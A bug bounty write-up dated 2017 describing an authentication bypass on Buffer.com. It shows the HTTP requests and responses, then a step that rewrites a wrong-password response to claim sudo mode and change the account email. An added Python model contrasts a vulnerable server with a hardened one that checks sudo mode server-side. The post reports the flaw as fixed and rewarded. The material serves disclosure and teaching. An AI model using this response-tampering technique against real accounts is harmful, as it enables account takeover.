
Sunday, August 20, 2017

Buffer Authentication Bypass



Hi everyone, here is one of my findings on Buffer.com, where I managed to bypass the authentication check that guards account email changes.

The authentication workflow is as follows:
  • To change the account email, the user must provide the current account password.
  • If the password is correct, the application lets you change the account email.

So let's start.

When a user wants to change their account email, the app asks for the current password, as shown below:




Here I wanted to compare the responses for a correct and an incorrect password.

This is the request:

POST /account/set-sudomode HTTP/1.1
Date: ******
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword


The response for a wrong password is below:

HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}



And here is the response for the correct password:



HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}


If you compare the two responses, the only difference is that the correct-password response carries notice_message and sudomode instead of error_message; the csrf_token is returned either way.

So I submitted a wrong password, say 123456.



The request looks like this:

POST /account/set-sudomode HTTP/1.1
Date: ******
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456



Note the csrf_token value in the request: uyr37832rhehr8he7372829hefdgdf


Response:


HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}



Now intercept that response before it reaches the browser and rewrite it to match the correct-password response (same sudomode flag, same csrf_token the server just issued):

HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}


Boom, the app now shows you as successfully authenticated and lets you change the email. Note that the forged response never touched the server: the fact that the email change still went through means the server was not checking on its own side that sudo mode had actually been granted, so the gate lived entirely in client-side state. When testing this class of bug, always confirm that the follow-on privileged request is genuinely accepted by the server; a forged response that only changes what the UI displays is not a bypass.
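To make the failure mode concrete, here is an added example (my own model, not Buffer's code) of the sudo-mode flow described above, with a server that never records whether sudo mode was granted beside one that keeps the grant in a server-side session and re-checks it on the email change. The endpoint names set-sudomode and set_email, the sample account, the "correct horse" password, the 300-second sudo TTL and the intercepting function forge_success are all assumptions for illustration.

```python
"""Model of the set-sudomode / change-email flow and the response-manipulation bypass.

Added example, not Buffer's code. Account data, endpoint names and the TTL are assumed.
"""
import hashlib
import hmac
import os
import time

SUDO_TTL = 300  # assumed: seconds a sudo-mode grant stays valid server-side
SALT = os.urandom(16)


def _hash(password: str) -> bytes:
    """PBKDF2 hash of the password with the process-wide salt (constructed demo account)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)


# Constructed sample account; "correct horse" is the real password.
ACCOUNT = {"email": "alice@example.com", "pw_hash": _hash("correct horse")}


class VulnerableServer:
    """Sudo mode is only ever reported back to the client; the server keeps no record of it."""

    def __init__(self):
        self.account = dict(ACCOUNT)

    def set_sudomode(self, password: str) -> dict:
        if hmac.compare_digest(_hash(password), self.account["pw_hash"]):
            return {"notice_message": "Great, we believe it's really you",
                    "sudomode": "true", "csrf_token": "tok"}
        return {"error_message": "That's not your current password", "csrf_token": "tok"}

    def set_email(self, new_email: str) -> dict:
        # Nothing here asks whether sudo mode was ever granted; the UI is the only gate.
        self.account["email"] = new_email
        return {"notice_message": "Email updated"}


class HardenedServer(VulnerableServer):
    """The grant lives in the server-side session with an expiry and is re-checked on use."""

    def __init__(self):
        super().__init__()
        self.session = {}  # stands in for the session bound to the user's cookie

    def set_sudomode(self, password: str) -> dict:
        resp = super().set_sudomode(password)
        if resp.get("sudomode") == "true":
            self.session["sudo_until"] = time.monotonic() + SUDO_TTL
        return resp

    def set_email(self, new_email: str) -> dict:
        if self.session.get("sudo_until", 0) < time.monotonic():
            return {"error_message": "Re-authentication required"}
        return super().set_email(new_email)


def forge_success(resp: dict) -> dict:
    """The proxy edit from the post: replace the error body with a success body."""
    return {"notice_message": "Great, we believe it's really you",
            "sudomode": "true", "csrf_token": resp["csrf_token"]}


class Client:
    """Browser-side logic: flips into sudo mode purely on the JSON it receives."""

    def __init__(self, server, intercept=None):
        self.server = server
        self.intercept = intercept  # attacker's proxy hook on the response, if any
        self.sudomode = False

    def enter_password(self, password: str) -> bool:
        resp = self.server.set_sudomode(password)
        if self.intercept:
            resp = self.intercept(resp)
        self.sudomode = resp.get("sudomode") == "true"
        return self.sudomode

    def change_email(self, new_email: str) -> dict:
        if not self.sudomode:
            return {"error_message": "UI gate: not in sudo mode"}
        return self.server.set_email(new_email)


def run_attack(server_cls) -> str:
    """Wrong password plus a forged response; returns the email the server ends up with."""
    server = server_cls()
    client = Client(server, intercept=forge_success)
    client.enter_password("123456")
    client.change_email("attacker@example.com")
    return server.account["email"]


def run_legit(server_cls) -> str:
    """Correct password, no tampering; the hardened server must still allow this."""
    server = server_cls()
    client = Client(server)
    client.enter_password("correct horse")
    client.change_email("new@example.com")
    return server.account["email"]


if __name__ == "__main__":
    print("vulnerable:", run_attack(VulnerableServer))  # attacker@example.com
    print("hardened:  ", run_attack(HardenedServer))    # alice@example.com
```

The client is the same in both runs and is fooled both times; the difference is entirely whether set_email consults state the attacker cannot edit. The session entry also gives the grant a lifetime, so a stale sudo-mode flag on a long-open page cannot be cashed in later.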


Here is the video proof of concept:

 


Status: Fixed
Bounty: Rewarded